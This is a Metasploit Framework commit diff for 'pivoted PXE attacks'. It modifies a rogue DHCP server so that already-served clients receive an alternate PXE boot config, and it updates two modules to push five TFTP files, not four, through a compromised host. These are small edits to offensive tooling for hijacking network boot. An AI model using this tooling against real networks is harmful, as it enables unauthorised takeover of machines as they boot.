Fixes #5312 for pivoted PXE attacks.
git-svn-id: file:///home/svn/framework3/trunk@13634 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
53e43fa847
commit
06c3dabe31
Binary file not shown.
Binary file not shown.
|
@ -222,6 +222,9 @@ int DHCPserv::run(){
|
|||
string pxeConfigFile("update2");
|
||||
stringOptionCheck(&pxeConfigFile, "PXECONF");
|
||||
|
||||
string pxeAltConfigFile("update0");
|
||||
stringOptionCheck(&pxeAltConfigFile, "PXEALTCONF");
|
||||
|
||||
string pxePathPrefix("");
|
||||
//get DHCP parameters
|
||||
unsigned int leaseTime = 600;
|
||||
|
@ -336,10 +339,6 @@ int DHCPserv::run(){
|
|||
if (messageType == DHCPDiscover){ //DHCP Discover - send DHCP Offer
|
||||
pkt << DHCPOffer;
|
||||
|
||||
// check if already served based on hw addr (MAC address)
|
||||
if (serveOnce == true && served.count(clienthwaddr) > 0)
|
||||
continue; //Already served; allowing normal boot
|
||||
|
||||
}else if (messageType == DHCPRequest){ //DHCP Request - send DHCP ACK
|
||||
pkt << DHCPAck;
|
||||
|
||||
|
@ -360,6 +359,11 @@ int DHCPserv::run(){
|
|||
pkt << dhcpoption(OpDns, iton(dnsServer));
|
||||
string pxemagic(PXEMagic,4);
|
||||
pkt << dhcpoption(OpPXEMagic, pxemagic);
|
||||
|
||||
// check if already served based on hw addr (MAC address)
|
||||
if (serveOnce == true && served.count(clienthwaddr) > 0)
|
||||
pkt << dhcpoption(OpPXEConfigFile, pxeAltConfigFile); //Already served; allowing normal boot
|
||||
else
|
||||
pkt << dhcpoption(OpPXEConfigFile, pxeConfigFile);
|
||||
pkt << dhcpoption(OpPXEPathPrefix, pxePathPrefix);
|
||||
pkt << dhcpoption(OpPXERebootTime, iton(pxeRebootTime));
|
||||
|
|
|
@ -93,8 +93,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("Loading DHCP options...")
|
||||
client.lanattacks.load_dhcp_options(datastore)
|
||||
1.upto(4) do |i|
|
||||
print_status("Loading file #{i} of 4")
|
||||
0.upto(4) do |i|
|
||||
print_status("Loading file #{i+1} of 5")
|
||||
if i < 4
|
||||
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
||||
else
|
||||
|
|
|
@ -71,8 +71,8 @@ class Metasploit3 < Msf::Post
|
|||
print_status("Loading DHCP options...")
|
||||
client.lanattacks.load_dhcp_options(datastore)
|
||||
|
||||
1.upto(4) do |i|
|
||||
print_status("Loading file #{i} of 4")
|
||||
0.upto(4) do |i|
|
||||
print_status("Loading file #{i+1} of 5")
|
||||
contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
|
||||
client.lanattacks.add_tftp_file("update#{i}",contents)
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue